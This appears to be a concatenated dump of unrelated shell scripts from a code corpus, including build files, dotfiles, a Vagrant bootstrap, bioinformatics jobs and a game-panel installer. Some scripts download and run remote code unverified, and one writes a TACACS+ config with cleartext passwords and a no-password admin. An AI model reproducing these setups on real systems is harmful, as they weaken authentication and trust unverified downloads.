-f|--frontend)
FRONTEND="$2"
shift # past argument
shift # past value
;;
-b|--backend)
BACKEND="$2"
shift # past argument
shift # past value
;;
-o|--output)
OUTPUT="$2"
shift # past argument
shift # past value
;;
esac
done
TIMESTAMP=$(date "+%Y.%m.%d-%H.%M.%S")
if ! [ ${OUTPUT} ]; then
OUTPUT="frontend/test/logs/test.${TIMESTAMP}.log"
fi
echo "TEST SESSION -- ${TIMESTAMP}" > ${OUTPUT}
echo "" >> ${OUTPUT}
if ! [[ ${FRONTEND} || ${BACKEND} ]]; then
echo "You must supply a path to at least a frontend or backend test folder"
exit
fi
if [ ${FRONTEND} ]; then
for folder in $( ls ${FRONTEND} ); do
for file in $( find ${FRONTEND}/${folder} -name "*.input.txt" -print0 | xargs -0 ls); do
echo "###### Running test ${file} ######" >> ${OUTPUT}
ACCOUNTS_FILE=$(echo ${file} | awk -F'[.]' '{print $1}' ).accounts.txt
OUTPUT_FILE_NAME=$(echo ${file} | awk -F'[.]' '{print $1}').output.txt
OUTPUT_FILE=$(find ${FRONTEND}/${folder} -name "$(echo ${OUTPUT_FILE_NAME} | awk -F'[/]' '{print $4}')")
python3 -m frontend ${ACCOUNTS_FILE} ${file} >> ${OUTPUT} 2>&1
echo "" >> ${OUTPUT}
TEST_NAME=$(echo ${file} | awk -F'[.]' '{print $1}' | awk -F'[/]' '{print $4}')
SUMMARY_FILE=$(find frontend/sessions -name "*.${TEST_NAME}.txt" -print0 | xargs -0 ls -t | head -1)
if [ ${OUTPUT_FILE} ]; then
echo "###### comparing ${SUMMARY_FILE} ${OUTPUT_FILE}"
if cmp -b -s ${SUMMARY_FILE} ${OUTPUT_FILE}; then
echo "The files match"
else
echo "The files are different"
fi
diff ${SUMMARY_FILE} ${OUTPUT_FILE}
echo ""
fi
done
done
# Diff output files and logs
fi
if [ ${BACKEND} ]; then
cd ${BACKEND}
pwd
# loop here
fi
echo "done" | true |
aacfea3dd69bc5ccd14bf3fcb8f84c142d895578 | Shell | msys2/MINGW-packages | /mingw-w64-libftdi/PKGBUILD | UTF-8 | 2,235 | 3 | 3 | [
"BSD-3-Clause"
] | permissive | # Maintainer: David Grayson <davidegrayson@gmail.com>
_realname=libftdi
pkgbase=mingw-w64-${_realname}
pkgname="${MINGW_PACKAGE_PREFIX}-${_realname}"
pkgver=1.5
pkgrel=5
pkgdesc='Library to talk to FTDI chips, with Python 3 bindings (mingw-w64)'
arch=('any')
mingw_arch=('mingw32' 'mingw64' 'ucrt64' 'clang64' 'clangarm64' 'clang32')
url="https://www.intra2net.com/en/developer/libftdi/"
license=('LGPL', 'GPL')
makedepends=("${MINGW_PACKAGE_PREFIX}-cmake"
"${MINGW_PACKAGE_PREFIX}-boost"
"${MINGW_PACKAGE_PREFIX}-swig"
"${MINGW_PACKAGE_PREFIX}-python"
"${MINGW_PACKAGE_PREFIX}-cc")
depends=("${MINGW_PACKAGE_PREFIX}-libusb"
"${MINGW_PACKAGE_PREFIX}-confuse"
"${MINGW_PACKAGE_PREFIX}-gettext"
"${MINGW_PACKAGE_PREFIX}-libiconv")
optdepends=("${MINGW_PACKAGE_PREFIX}-python: Python bindings to libftdi")
options=('staticlibs' 'strip')
source=("https://www.intra2net.com/en/developer/libftdi/download/libftdi1-${pkgver}.tar.bz2"
"0001-cmake-fix-libdir.patch")
sha256sums=('7c7091e9c86196148bd41177b4590dccb1510bfe6cea5bf7407ff194482eb049'
'71d5a8de43a61c7e26531c722862dc7c4135e4b494498d2bd140019f9693741c')
prepare() {
cd ${_realname}1-${pkgver}
patch -p1 -i "${srcdir}/0001-cmake-fix-libdir.patch"
}
build() {
rm -rf "${srcdir}/build-${MINGW_CHOST}"
mkdir -p "${srcdir}/build-${MINGW_CHOST}"
cd "${srcdir}/build-${MINGW_CHOST}"
MSYS2_ARG_CONV_EXCL="-DCMAKE_INSTALL_PREFIX=" \
${MINGW_PREFIX}/bin/cmake \
-G"MSYS Makefiles" \
-DCMAKE_INSTALL_PREFIX="${MINGW_PREFIX}" \
-DCMAKE_BUILD_TYPE=Release \
-DEXAMPLES=OFF \
-DPYTHON_BINDINGS=ON \
-DLINK_PYTHON_LIBRARY=ON \
-DDOCUMENTATION=OFF \
"../${_realname}1-${pkgver}/"
make
}
check() {
cd "${srcdir}/build-${MINGW_CHOST}"
PATH=$PATH:"${srcdir}/build-${MINGW_CHOST}/src" make check || true
}
package() {
cd "${srcdir}/build-${MINGW_CHOST}"
make DESTDIR="${pkgdir}" install
cd "${srcdir}/${_realname}1-${pkgver}"
mkdir -p "${pkgdir}${MINGW_PREFIX}/share/licenses/${_realname}"
cp COPYING* "${pkgdir}${MINGW_PREFIX}/share/licenses/${_realname}"
sed -i "s;$(cygpath -m /);/;" \
"${pkgdir}${MINGW_PREFIX}/lib/cmake/${_realname}1"/*.cmake
}
| true |
ee8510076fd2ae8d64427b926cad80f791a39d2f | Shell | matthewfeickert/dotfiles | /.bashrc_user | UTF-8 | 3,855 | 3.4375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env bash
# Add temporary PATH modification until next load of .profile
if [ -f "/tmp/.profile" ]; then
. /tmp/.profile
fi
if [ -f "/tmp/.bash_profile" ]; then
. /tmp/.bash_profile
fi
# Avoid CVE-2022-24765
# c.f. https://github.blog/2022-04-12-git-security-vulnerability-announced/
export GIT_CEILING_DIRECTORIES="/home"
# Enable .pythonrc.py
if [ -f "${HOME}/.pythonrc.py" ]; then
export PYTHONSTARTUP="${HOME}/.pythonrc.py"
fi
# Ensure that pip can't install outside a virtual environment
export PIP_REQUIRE_VIRTUALENV=true
# Ensure local virtualenv setup
if [ ! -f "${HOME}/opt/venv/bin/virtualenv" ]; then
curl -sL --location --output /tmp/virtualenv.pyz https://bootstrap.pypa.io/virtualenv.pyz
python3 /tmp/virtualenv.pyz ~/opt/venv
~/opt/venv/bin/pip install --upgrade pip
~/opt/venv/bin/pip install virtualenv
mkdir -p ~/bin # Ensure exists if new machine
ln -s ~/opt/venv/bin/virtualenv ~/bin/virtualenv
fi
# Add pyenv
if [ -d "${HOME}/.pyenv/bin" ]; then
eval "$(pyenv init -)"
# Place pyenv shims on path
if [[ ":${PATH}:" != *":$(pyenv root)/shims:"* ]]; then
eval "$(pyenv init --path)"
fi
if [ -d "${HOME}/.pyenv/plugins/pyenv-virtualenv" ]; then
# Place pyenv-virtualenv shims on path
if [[ ":${PATH}:" != *":$(pyenv root)/plugins/pyenv-virtualenv/shims:"* ]]; then
eval "$(pyenv virtualenv-init -)"
fi
fi
# Allow for prompt updating on venv switch
# c.f. https://github.com/pyenv/pyenv-virtualenv/issues/135#issuecomment-717554081
export PYENV_VIRTUALENV_DISABLE_PROMPT=1
export BASE_PROMPT=$PS1
function updatePrompt {
if [[ "$(pyenv version-name)" != "system" ]]; then
PYENV_VER=$(pyenv version-name) # capture version name in variable
export PS1="(${PYENV_VER%%:*}) "$BASE_PROMPT # grab text prior to first ':' character
else
export PS1=$BASE_PROMPT
fi
}
export PROMPT_COMMAND='updatePrompt'
# default venv
if [ -d "${HOME}/.pyenv/versions/base" ]; then
pyenv activate base
fi
alias deactivate='pyenv deactivate'
fi
# Enable tab completion of Python virtual environments
if [ -f /opt/_venv-activate/_venv-activate.sh ]; then
_VENV_ACTIVATE_HOME="${HOME}/.venvs"
_VENV_ACTIVATE_PYTHON=$(which python3)
. /opt/_venv-activate/_venv-activate.sh
fi
# Enable pipx shell completions
if [ -f "${HOME}/bin/pipx" ]; then
eval "$(register-python-argcomplete pipx)"
fi
# Enable h5ls tab completion
if [ -f /opt/_h5ls/_h5ls.sh ]; then
. /opt/_h5ls/_h5ls.sh
fi
# Add GPG key
export GPG_TTY=$(tty)
# Ensure LD_LIBRARY_PATH exists if application unsets it
if [ -z "${LD_LIBRARY_PATH}" ]; then
LD_LIBRARY_PATH="${_PRESERVE_LD_LIBRARY_PATH}"; export LD_LIBRARY_PATH;
fi
# Ensure EDITOR is set for use by bash's 'edit-and-execute-command'
if [ -z "${EDITOR}" ]; then
export EDITOR="$(command -v vim)"
fi
# User Functions
# c.f. https://gist.github.com/matthewfeickert/498cd93af35b6664caab5dece20342e1
# remember to xhost +
function root-docker () {
local input_path
input_path="${1}"
if [ -z "${input_path}" ]; then
input_path=$(pwd)
fi
if [[ "${input_path}" == "shell" ]]; then
cmd='/bin/bash'
else
if [[ "${input_path::7}" == "root://" ]]; then
# Accessing file over xrootd
file_path="${input_path}"
else
file_path=$(readlink -f ${input_path})
fi
cmd="root -l ${file_path}"
fi
docker run --rm -ti \
-e DISPLAY="${DISPLAY}" \
-v /tmp/.X11-unix:/tmp/.X11-unix \
-v /tmp/"krb5cc_$(id -u ${USER})":/tmp/krb5cc_0 \
-v /tmp/:/tmp/ \
-v "${HOME}":"${HOME}" \
atlasamglab/stats-base:root6.24.06 "${cmd}"
}
| true |
044de32af8afd66a3ad248d4bec1a64c6cae72b2 | Shell | urvishpanchal/shakedown | /bootstrap.sh | UTF-8 | 2,529 | 2.828125 | 3 | [] | no_license | #!/bin/bash
apt-get update
apt-get upgrade -y
apt-get install -y build-essential git
apt-get install -y libfreetype6 libfreetype6-dev pkg-config
apt-get install -y python-dev python-pip
#apt-get install -y redis-server redis-tools
#pip install redis rq --upgrade
pip install six
pip install jinja2
pip install paramiko
pip install git+https://github.com/aristanetworks/arcomm.git
# install scipy stack
apt-get install -y python-numpy python-scipy python-matplotlib ipython \
ipython-notebook python-pandas python-sympy python-nose
#cd /vagrant; python setup.py develop
# install/setup supporting services
apt-get install -y ntp dnsmasq tacacs+ nginx
apt-get install -y syslog-ng syslog-ng-core
if ! grep -q autotest /etc/hosts; then
cat >> /etc/hosts <<EOF
192.168.56.7 shakedown
192.168.56.21 vswitch1
192.168.56.22 vswitch2
192.68.56.6 testrail
EOF
fi
cat > /etc/ntp.conf <<EOF
driftfile /var/lib/ntp/ntp.drift
statistics loopstats peerstats clockstats
filegen loopstats file loopstats type day enable
filegen peerstats file peerstats type day enable
filegen clockstats file clockstats type day enable
server 0.ubuntu.pool.ntp.org iburst
server 1.ubuntu.pool.ntp.org iburst
server 2.ubuntu.pool.ntp.org iburst
server 3.ubuntu.pool.ntp.org iburst
server ntp.ubuntu.com
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery
restrict 127.0.0.1
restrict ::1
restrict 0.0.0.0 mask 0.0.0.0 modify notrap
EOF
cat > /etc/dnsmasq.d/local.conf <<EOF
local=/shakedown/
expand-hosts
domain=shakedown
EOF
cat > /etc/tacacs+/tac_plus.conf <<EOF
key = "shakedown"
accounting file = /var/log/tac_plus.acct
group = admins {
default service = permit
service = exec {
priv-lvl = 15
}
}
group = rousers {
default service = permit
service = exec {
priv-lvl = 1
}
}
user = admin {
member = admins
login = nopassword
}
user = shakedown {
member = admins
login = cleartext shakedown
}
user = rouser {
member = rouser
login = cleartext nocuser
}
EOF
cat > /etc/syslog-ng/conf.d/network.conf <<EOF
options { keep_hostname(yes); };
source s_net { tcp(); udp(); };
filter f_lessnoisy { not (
message("LINEPROTO")
or message("SPANTREE")
);
};
destination d_net { file("/var/log/network"); };
# uncomment this line (and comment out the next one) to discard noisy logs messages
#log { source(s_net); filter(f_lessnoisy); destination(d_net); };
log { source(s_net); destination(d_net); };
EOF
| true |
4801f0f86c0dff69255102f50866cf5309728c9b | Shell | MessaoudiLab/RNA-Seq-Analysis | /Small RNA/small_rna_trimming.sh | UTF-8 | 1,177 | 3.1875 | 3 | [] | no_license | #!/bin/bash -l
fq=$1
shift
#SBATCH --nodes=1
#SBATCH --ntasks=10
#SBATCH --cpus-per-task=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=1-00:15:00 # 1 day and 15 minutes
#SBATCH --output=alignment.stdout
#SBATCH --mail-user=useremail@address.com
#SBATCH --mail-type=ALL
#SBATCH --job-name="small RNA trimming - QIASeq"
#SBATCH -p intel # This is the default partition, you can use any of the following; intel, batch, highmem, gpu
#Load the packages
module load trim_galore
module load fastqc
first="_trimmed.fq.gz"
second="_trimmed_trimmed.fq.gz"
third="_trimmed_trimmed_trimmed.fq.gz"
fourth="_trimmed_trimmed_trimmed_trimmed.fq.gz"
#Trim the small rna adapters. Reads shorter than 18 bp are removed
trim_galore --no_report_file -q 20 --small_rna $fq.fastq.gz
#Trim the 3' adapter.
trim_galore --no_report_file -q 20 --length 0 -a AACTGTAGGCACCATCAAT $fq$first
#Trims the 5' adapter.
trim_galore -q 20 --no_report_file --length 0 -a GATCGTCGGACTGTAGAACTCTGAAC $fq$second
#Finally trim the illumina adapters and reduce the length from 15-30 bp
trim_galore -q 20 --length 15 --max_length 30 --illumina --fastqc $fq$third
rm $fq$first
rm $fq$second
rm $fq$third
mv $fq$fourth $fq$first
| true |
61c4bca9a1b09d81f60a8cd54ea198eb2350a2c7 | Shell | LGDIS/LGDIS-Deploy | /templates/unicorn/unicorn.init.erb.example | UTF-8 | 1,531 | 3.421875 | 3 | [] | no_license | #!/bin/bash
#
# unicorn
#
# chkconfig: - 85 15
# description: unicorn start/stop script.
#
#
# set rvm environment valiables.
#
export PATH=/usr/local/ruby/bin:/var/rails/bagel/current/sbin:$PATH
set -u
set -e
APP_NAME=<%= application %>
APP_ROOT=<%= current_path %>
CNF="<%= deploy_to %>/shared/config/unicorn.conf"
PID="<%= deploy_to %>/shared/pids/unicorn.<%= unicorn_port %>.pid"
ENV=<%= rails_env %>
#UNICORN_OPTS="-D -E $ENV -c $CNF --path /${APP_NAME}"
UNICORN_OPTS="-D -E $ENV -c $CNF"
UNICORN_CMD="bundle exec unicorn "
old_pid="$PID.oldbin"
cd $APP_ROOT || exit 1
sig () {
test -s "$PID" && kill -$1 `cat $PID`
}
oldsig () {
test -s $old_pid && kill -$1 `cat $old_pid`
}
case ${1-help} in
start)
sig 0 && echo >&2 "Already running" && exit 0
cd $APP_ROOT ; $UNICORN_CMD $UNICORN_OPTS
;;
stop)
sig QUIT && exit 0
echo >&2 "Not running"
;;
force-stop)
sig TERM && exit 0
echo >&2 "Not running"
;;
restart|reload)
sig HUP && echo reloaded OK && exit 0
echo >&2 "Couldn't reload, starting instead"
$UNICORN_CMD $UNICORN_OPTS
;;
upgrade)
sig USR2 && exit 0
echo >&2 "Couldn't upgrade, starting instead"
$UNICORN_CMD $UNICORN_OPTS
;;
rotate)
sig USR1 && echo rotated logs OK && exit 0
echo >&2 "Couldn't rotate logs" && exit 1
;;
*)
echo >&2 "Usage: $0 <start|stop|restart|upgrade|rotate|force-stop>"
exit 1
;;
esac
| true |
a8ef8fa03e08219c31a54bf42867dd10aae8e1cd | Shell | Hikari2/myservicebook | /patch-sagui.sh | UTF-8 | 403 | 2.875 | 3 | [] | no_license | #!/bin/bash
DEV_SERVER="src/main/frontend/node_modules/sagui/lib/runner/development-server.js"
PATCH="setupHMR(saguiOptions).webpack), Object.assign(options, saguiOptions.devServer))"
echo "Patching sagui"
cp ${DEV_SERVER} "${DEV_SERVER}.backup"
cat ${DEV_SERVER} | sed "s|setupHMR(saguiOptions).webpack), options)|${PATCH}|" > patched-dev-server.js
mv patched-dev-server.js ${DEV_SERVER}
echo "done"
| true |
68259285a6d259c72ec74d0d8499380791287e37 | Shell | ripley57/CW_Tools | /tools/filetools/join_demos/demo2.sh | UTF-8 | 617 | 3.578125 | 4 | [] | no_license | # demo2.sh
#
#Description:
# Return the lines where the specified column does not only exist
# in the first file.
#
# Note: By default join will condisder the first column in each file.
# Note: The two files must be sorted, by the column being compared.
#
#cat demo2_file1.txt
#1. Asia:
#2. Africa:
#3. Europe:
#4. North America:
#
#cat demo2_file2.txt
#1. India
#3. The Netherlands
#4. The US
#
#Command:
# join -v 1 demo2_file1.txt demo2_file2.txt
#
#Expected result:
#2. Africa:
#
# Note: Similarly, use "-v 2" to see lines that only exist in the
# second file.
join -v 1 demo2_file1.txt demo2_file2.txt
| true |
5ed43221992dd98b8519a27d074c2ded60ddad0a | Shell | vanleiko/unix-course | /guessinggame.sh | UTF-8 | 790 | 3.96875 | 4 | [] | no_license | #!/usr/bin/env bash
function compare_numbers {
read input_num
local number=$(ls | wc -l)
if [[ $input_num = $number ]]
then
result="Correct"
elif [[ $input_num -gt $number ]]
then
result="Greater"
else
result="Lower"
fi
echo $result
}
continue_game="Yes"
echo ">>> Welcome to the Guessing Game! <<<"
echo "Guess how many files are in the current directory?"
while [[ $continue_game = "Yes" ]]
do
output=$(compare_numbers)
if [[ $output = "Correct" ]]
then
echo "Congratulations! Your answer is correct!"
let continue_game="No"
elif [[ $output = "Greater" ]]
then
echo "Your answer was too high! Try again:"
elif [[ $output = "Lower" ]]
then
echo "Your answer was to low... try again:"
fi
done
echo "END OF THE GAME"
echo "Thanks for playing :) "
| true |
500995780673be350f0f86582849be1382e7a420 | Shell | teamonefist/irz-rootfs | /home/httpd/cgi-bin/admin_startup_set.cgi | UTF-8 | 278 | 2.703125 | 3 | [] | no_license | #!/bin/sh /usr/lib/irz-web/setscript
formq script | tr -d '\r' > /mnt/rwfs/settings/startup
if [ "`formq script_enabled`" = "on" ]; then
chmod 0755 /mnt/rwfs/settings/startup
else
chmod 0644 /mnt/rwfs/settings/startup
fi
echo "<hr><a href=\"admin_startup.cgi\">Return</a>"
| true |
512918aee6b9cc719adb99896cf032ff65688330 | Shell | painless-software/painless-continuous-delivery | /tests/field/include/api/gitlab.sh | UTF-8 | 347 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash -e
#
# GitLab API access helper functions.
gitlab() {
COMMAND="$1"
RESOURCE="$2"
PROJECT_URL="https://gitlab.com/api/v4/projects/${GITLAB_PROJECT_NAME}"
set -e
curl --silent \
--header "Authorization: Bearer $GITLAB_API_TOKEN" \
--request $COMMAND \
"${PROJECT_URL}/${RESOURCE}" "${@:3}"
}
| true |
62ae5dc31643377be64a06c2cbc218eaf5a99ba1 | Shell | JohnSun23/SmartGridProject | /setup.sh | UTF-8 | 841 | 2.921875 | 3 | [] | no_license | #!/bin/bash
ion_username="melkherj"
ion="ion-21-14.sdsc.edu"
# We're not on the io-node on gordon
if [[ `hostname` != *sdsc.edu ]]
then
# For accessing hdfs
export sshion="ssh ${ion_username}@${ion}"
export SMART_GRID_DATA="$(pwd)/../data"
fi
# Smart Grid Compression source directory
export SMART_GRID_SRC=`pwd`
# The hdfs directory containing the oledb_tag_aggregate part files
export hdfs_part_root_dir="/user/melkherj/preprocessed_power_data"
# Directory to store output data. An example: the compressed pandas/pickle files
export compression_data_dir="${SMART_GRID_DATA}/compression"
# The file containing the mapping from tags to files
export part_tag_path="${SMART_GRID_DATA}/summary_data/tag_part_seek"
# The directory containing space/error files
export space_err_dir="${SMART_GRID_DATA}/summary_data/space_errors"
| true |
e5b0d6acd63dbca7172da74d5ca8747d81a8cce1 | Shell | zheng1204/zheng | /12.sh | UTF-8 | 184 | 3 | 3 | [] | no_license | #!/bin/bash
for i in {1..254}
do
ping -c1 -i0.1 -W1 192.168.4.$i >/dev/null
if [ $? -eq 0 ];then
echo "host 192.168.4.$i is up."
else
echo "host 192.168.4.$i is down."
fi
done
| true |
872b4606bb3f1f282de56be00e0b6ff620cbaac1 | Shell | lgq2015/dumpshell | /dumpshell/dump.sh | UTF-8 | 898 | 3.546875 | 4 | [] | no_license | #判断参数个数
if [ $# != 1 ]; then
echo "参数不正确"
echo "本命令只接收一个参数,参数是可执行文件的名称,请这样使用:dump name"
exit
fi
#通过遍历/var/mobile/Containers/Data/Application/中所有沙盒文件的.metadata.plist查找有参数$1的文件路径
cd /var/mobile/Containers/Data/Application/
for filename in `find . -name '*.metadata.plist'`
do
grep "$1" $filename
if [ $? -eq 0 ]; then
var=$filename
break
fi
done
dir=${var%/*}
documentDir=$dir"/Documents"
echo "document path ----> "$documentDir
echo "copy /var/root/dumpdecrypted.dylib ----> ${documentDir}"
cp /var/root/dumpdecrypted.dylib $documentDir
#切换到dumpdecrypted所在的目录
cd $documentDir
cmdpath=`find /var/containers/Bundle/Application/ -name "*$1"`
echo "---->DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib "$cmdpath
DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib $cmdpath
| true |
ca673b134bbf09534b8a5ff1d4a1f37ac447f5ea | Shell | jdelaporte/dotfiles | /scripts/android-push-music | UTF-8 | 580 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# A quick Linux script to syncronize music with my Droid phone.
# Usage:
# >sync-droid-music /media/DROID
# Uncomment the following for the first run, if you're on Ubuntu:
# sudo apt-get install rsync
# Move extraneous music files into the Music directory.
mkdir $1/Music
mv $1/amazonmp3/* $1/Music
echo "Moved Amazon MP3s into Music directory."
# Push any music not on the phone.
rsync --recursive --progress \
~/Music $1
#j --verbose \
# --exclude "*" \
#$ --include "*.mp3" \
#$ --include "*.m43" \
# --include "*.m3u" \
echo "Music pushed to phone."
| true |
80e53d07f10594f9d0c2692880c5aaa12783c32a | Shell | wangqiang8511/docker-elasticsearch-mesos | /etcd_ttl.sh | UTF-8 | 251 | 2.546875 | 3 | [] | no_license | #!/bin/bash
ETCD_SERVER=${ETCD_SERVER:-"http://localhost:4001"}
ES_CLUSTER_NAME=${ES_CLUSTER_NAME:-"test"}
while true;
do
curl -L -XPUT "$ETCD_SERVER/v2/keys/es/$ES_CLUSTER_NAME/$(hostname -f)" -d value=$(hostname -i) -d ttl=10
sleep 5
done
| true |
d62ac0477b4c8f7e79495a6f70a0c1ecb7afb989 | Shell | kalisjoshua/dotfiles | /install | UTF-8 | 328 | 3.109375 | 3 | [] | no_license | #! /bin/bash
echo "set completion-ignore-case On" >> ~/.inputrc
# get the bash tab-completion script
curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-completion.bash -o ~/.git-completion.bash
for src in $(pwd)/custom/.*
do
if [ ! -d $src ]; then
ln -fs $src $HOME/$(basename $src)
fi
done
| true |
1f36540c1672f203b95b4d68e7e386825e97ee35 | Shell | pmontp19/docker-facturascripts | /facturascripts.sh | UTF-8 | 177 | 2.625 | 3 | [] | no_license | #!/usr/bin/env bash
FILE=/var/www/html/.htaccess
if [ ! -f "$FILE" ]; then
cp -r /usr/src/facturascripts/* /var/www/html/; \
chmod -R o+w /var/www/html
fi
apache2-foreground | true |
901401d4ebdeac6dee649ff018c422b8a9a7d6e3 | Shell | wasimj/ephemeral-storage | /ephemeral.sh | UTF-8 | 922 | 3.21875 | 3 | [] | no_license | #!/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
export PATH
blockprefix=sd
xenprefix=xvd
stripes=0
lvmdevs=
vg=ec2
lv=ephemeral
ec2_api_url="http://169.254.169.254/latest"
if ! vgs ${vg} >/dev/null 2>&1; then
ephdevs=$( curl -s -XGET ${ec2_api_url}/meta-data/block-device-mapping/ |grep ephemeral )
for tdev in $ephdevs; do
dev=$( curl -s -XGET ${ec2_api_url}/meta-data/block-device-mapping/$tdev )
dev="/dev/"${dev/$blockprefix/$xenprefix}
if [ -b "$dev" ]; then
stripes=$[ $stripes + 1 ]
lvmdevs=${lvmdevs}" $dev"
fi
done
fi
pvcreate $lvmdevs
vgcreate ${vg} $lvmdevs
lvcreate -n ${lv} -l 100%FREE -i $stripes ${vg}
mkfs.ext4 -L ${lv} /dev/mapper/${vg}-${lv}
mkdir -p /opt/${lv}
mount /dev/mapper/${vg}-${lv} /opt/${lv}
# local initialization
if [ -f /etc/default/ec2-prepare-ephemeral-storage ]; then
. /etc/default/ec2-prepare-ephemeral-storage
fi
exit 0 | true |
c68a3a0886c1a975a62619176ff673c0ae3b2e09 | Shell | t04glovern/udemy-video-utils | /convert-and-build.sh | UTF-8 | 447 | 2.6875 | 3 | [] | no_license | #!/bin/bash
cd input
for line in *.mp4;
do name=`echo $line | cut -d'.' -f1`;
echo $line;
echo $name;
ffmpeg -i $line -i ../media/base/icon.png -filter_complex "overlay=10:main_h-overlay_h-10" "../output/${name}-layered.mp4"
ffmpeg -i ../media/base/intro.mp4 -i "../output/${name}-layered.mp4" -filter_complex "[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=unsafe=1:n=2:v=1:a=1 [v] [a]" -map "[v]" -map "[a]" "../output/${name}-v2.0.mp4"
done
| true |
e8eb99cc21406d59f8c268c70a18cf10cdc9c649 | Shell | syn2cat/pidor | /scripts/rsyslog-mikrotik.sh | UTF-8 | 490 | 3.265625 | 3 | [] | no_license | #!/bin/bash
exec 2>/tmp/out.log
set -x
PATH=/bin:/usr/bin
mkdir /run/dhcp-leases 2>/dev/null
while read l
do
ip="$(echo "$l" |
fgrep Address-Request|
fgrep "10.2.113" |
sed 's/^.* //')"
if [ "$ip" != "" ]
then
t=$(date +%s)
if [ -f "/run/dhcp-leases/$ip" ]
then
touch "/run/dhcp-leases/$ip"
else
logget -t $(basename $0) "new dhcp for $ip"
echo "$t" > "/run/dhcp-leases/$ip"
fi
echo "========== $t $ip" >> /tmp/out.log
fi
done
| true |
9ddcbe0950658cf12593a46b7f3c9f0780a3e886 | Shell | siyuanzhao/dissertation | /cfrnet/assistments_exp.sh | UTF-8 | 395 | 2.578125 | 3 | [
"MIT"
] | permissive | ps=$1
sea=$2
cnt=50
rname='lstm-autoencoder/results/'$1'_result.pkl'
directory='cfrnet'
mkdir results
if [ -d "$directory/results/$ps" ]
then
rm -rf $directory/results/$ps
fi
mkdir $directory/results/$ps
python $directory/cfr_param_search.py $directory/configs/assistments_exp.txt $cnt $ps $sea $rname
python $directory/evaluate.py $directory/configs/assistments_exp.txt 1 $sea $rname $ps
| true |
1d6f6f9c643b296a70929ffa9bae7ed38989b80e | Shell | joeyjoey1234/pterodactyl-egg-adminer-apache2 | /Final script admino Pterodactyl.txt | UTF-8 | 2,491 | 2.703125 | 3 | [] | no_license | #!/bin/bash
# joeys adminer scripppy
#
# Server Files: /mnt/server
printf '#!/bin/sh\nexit 0' > /usr/sbin/policy-rc.d
apt-get update
apt-get install dialog apt-utils -y
apt-get -y dist-upgrade
apt-get -y upgrade
export DEBIAN_FRONTEND=noninteractive
apt update
apt-get -y upgrade
apt-get update --fix-missing
apt-get install -y adminer
apt-get install curl
a2enmod ssl
mkdir /mnt/server/var/
mkdir /mnt/server/var/www/
mkdir /mnt/server/var/www/html
curl https://raw.githubusercontent.com/joeyjoey1234/pterodactyl-egg-adminer-apache2/main/conf.php > /mnt/server/var/www/html/conf.php
cp -R /usr/share/adminer /mnt/server
rm /var/www/html/index.html
cp /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/
rm /etc/apache2/sites-enabled/000-default.conf
sed -i '5s\.*\ DocumentRoot /home/container/var/www/html/conf.php \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '2s/.*/ DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm /' /etc/apache2/mods-enabled/dir.conf
sed -i '2s\.*\ <VirtualHost _default_:'"${SERVER_PORT}"'> \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '8s/.*/ Listen '"${SERVER_PORT}"'/' /etc/apache2/ports.conf
sed -i '12s/.*/ Listen '"${SERVER_PORT}"'/' /etc/apache2/ports.conf
sed -i '226s/.*/ServerName '"${SERVER_DOMAINNAME}"'/' /etc/apache2/apache2.conf
echo -e ''"${PEM_KEY}"'' > /mnt/server/${SERVER_DOMAINNAME}.pem
echo -e ''"${CERT_KEY}"'' > /mnt/server/${SERVER_DOMAINNAME}.key
sed -i '69s\.*\ServerRoot "/home/container/apache2/"\' /etc/apache2/apache2.conf
sed -i '32s\.*\ SSLCertificateFile /home/container/'"${SERVER_DOMAINNAME}"'.pem \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '134s\.*\ErrorLog /home/container/error.log \' /etc/apache2/apache2.conf
sed -i '33s\.*\ SSLCertificateKeyFile /home/container/'"${SERVER_DOMAINNAME}"'.key \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '13s\.*\ ErrorLog /home/container/error.log \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '14s\.*\ CustomLog /home/container/access.log combined \' /etc/apache2/sites-enabled/default-ssl.conf
sed -i '2s\.*\CustomLog /home/container/other_vhosts_access.log vhost_combined \' /etc/apache2/conf-enabled/other-vhosts-access-log.conf
sed -i '87s\.*\PidFile /home/container/apache2.pid \' /etc/apache2/apache2.conf
sed -i '170s\.*\<Directory /home/container/var/www/> \' /etc/apache2/apache2.conf
cp -R /etc/apache2 /mnt/server
| true |
76a1fd4bfaec8b71ad30bd00e9601813f4c68ef3 | Shell | solgenomics/sgn | /bin/jbrowse_vcf_tools/generate_indiv_vcfs.sh | UTF-8 | 2,224 | 4 | 4 | [
"MIT"
] | permissive | #!/bin/bash
#-------------------------------------------------------------------------------------------------------------------------------
# NAME
#
# generate_indiv_vcfs.sh
#
# SYNOPSIS
# Shell script for creating multiple versions of individual VCF files from a single multivcf and imputed dosage file.
#
# ./generate_indiv_vcfs.sh -v [multivcf file] -d [dosage file]
#
# To run, this script requires create_indiv.pl
# finish_indiv.pl
#-------------------------------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# 1 Parse command line arguments:
#-------------------------------------------------------------------------------
while [[ $# > 1 ]]
do
key="$1"
case $key in
-v|--multi.vcf)
MULTI_VCF="$2"
shift
;;
-d|--dosage)
DOSAGE="$2"
;;
esac
shift
done
echo MULTI_VCF = "$MULTI_VCF"
echo DOSAGE = "$DOSAGE"
if [ -z "$MULTI_VCF" ] || [ -z "$DOSAGE" ]
then
echo "Trouble reading command line arguments, make sure
-v [multi vcf file] and
-d [dosage file] are both specified";
exit
fi
#----------------------------------------------------------------------------------
# 2 create a nearly empty vcf file for each accession in the multi-vcf
#----------------------------------------------------------------------------------
echo Creating starter vcf files...
mkdir output
